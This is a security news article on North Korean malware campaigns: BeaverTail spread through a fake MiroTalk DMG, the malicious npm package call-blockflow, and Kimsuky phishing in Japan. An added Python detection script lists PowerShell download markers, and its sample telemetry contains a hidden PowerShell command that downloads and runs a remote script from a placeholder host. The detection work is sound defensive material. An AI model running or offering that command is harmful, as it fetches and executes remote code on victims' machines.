Updated Malware Targeting MacOS Users

Cybersecurity experts have identified a new variant of the BeaverTail malware, used by North Korean hackers, now targeting macOS users. This malware, previously known for attacking job seekers, is being distributed through a fake version of the MiroTalk video call service.

The malicious file, “MiroTalk.dmg,” appears to be a legitimate Apple macOS disk image but instead installs BeaverTail, a JavaScript-based stealer malware. Initially discovered in 2023, BeaverTail was part of the “Contagious Interview” campaign, which aimed to infect software developers during supposed job interviews.

BeaverTail steals sensitive information from web browsers and cryptocurrency wallets, and it can also deliver additional payloads like the Python-based InvisibleFerret backdoor, which installs AnyDesk for persistent remote access.

Previously, BeaverTail was spread through fake npm packages on GitHub and the npm registry. The latest attack involves hackers inviting victims to a hiring meeting via the infected MiroTalk hosted on mirotalk[.]net. Analysis of the DMG file shows it steals data from cryptocurrency wallets, iCloud Keychain, and browsers like Chrome, Brave, and Opera, and it downloads additional Python scripts from a remote server.

The campaign highlights DPRK hackers’ skill in targeting macOS, often using social engineering techniques. The disclosure coincides with the discovery of a new malicious npm package named call-blockflow by Phylum. This package mimics the legitimate call-bind library but downloads a remote binary file while evading detection.

The call-blockflow package, likely created by the Lazarus Group, was removed from npm shortly after being uploaded, but not before it was downloaded 18 times. This activity, involving over three dozen malicious packages, has been ongoing since September 2023.

JPCERT/CC recently issued an advisory about cyber attacks by the North Korean Kimsuky actor targeting Japanese organizations. These attacks begin with phishing messages containing a malicious executable that downloads a Visual Basic Script (VBS), which then retrieves a PowerShell script to harvest user data and execute a keylogger named InfoKey.
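A defender-side check for the VBS-to-PowerShell stage of that chain, as an added example that is not part of the original article or JPCERT/CC's advisory. The event field names are assumed (modelled on Sysmon process-creation records) and all sample events are constructed:

```python
"""Flag the VBS -> PowerShell hand-off in process-creation telemetry. Added example;
field names are assumed (Sysmon Event ID 1 style) and the events are constructed."""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Fragments that usually mean "fetch more code from the network and run it".
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "-encodedcommand", " -enc ")
HIDDEN_MARKERS = ("-w hidden", "-windowstyle hidden")

def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def reasons(event: dict) -> list:
    """Rules the event trips; an empty list means nothing matched."""
    image, parent = _name(event["Image"]), _name(event["ParentImage"])
    cmd = " " + event["CommandLine"].lower() + " "
    hits = []
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("powershell spawned by a script host")
    if image in POWERSHELL and any(m in cmd for m in DOWNLOAD_MARKERS) \
            and any(h in cmd for h in HIDDEN_MARKERS):
        hits.append("hidden powershell with a download primitive")
    if image in SCRIPT_HOSTS and "\\appdata\\local\\temp\\" in cmd and ".vbs" in cmd:
        hits.append("script host running a .vbs from the user temp folder")
    return hits

def find_suspicious(events) -> dict:
    """Map ProcessId -> triggered rules for every event that tripped at least one."""
    return {e["ProcessId"]: hits for e in events if (hits := reasons(e))}

# Constructed sample telemetry: 4100 and 4120 mimic the two stages of the chain,
# 4300 and 4310 are ordinary admin activity that must not be flagged.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Users\jdoe\Downloads\attachment.exe",
     "CommandLine": r"wscript.exe //B C:\Users\jdoe\AppData\Local\Temp\stage.vbs"},
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://placeholder.invalid/s.ps1'))"},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\"},
    {"ProcessId": 4310, "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript.exe C:\Scripts\inventory.vbs"},
]
```

Running `find_suspicious(SAMPLE_EVENTS)` flags 4100 (one rule) and 4120 (two rules) and leaves the two benign events alone.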

While attacks on Japanese organizations by Kimsuky have been few, JPCERT/CC warns of the potential for increased targeting in the region.

To prevent infections, macOS users should exercise caution when downloading and executing files from unfamiliar sources. Always verify the legitimacy of any software by checking official websites and trusted app stores. Additionally, be wary of unsolicited emails or messages requesting you to join meetings or download software, as these could be phishing attempts leading to malware infection.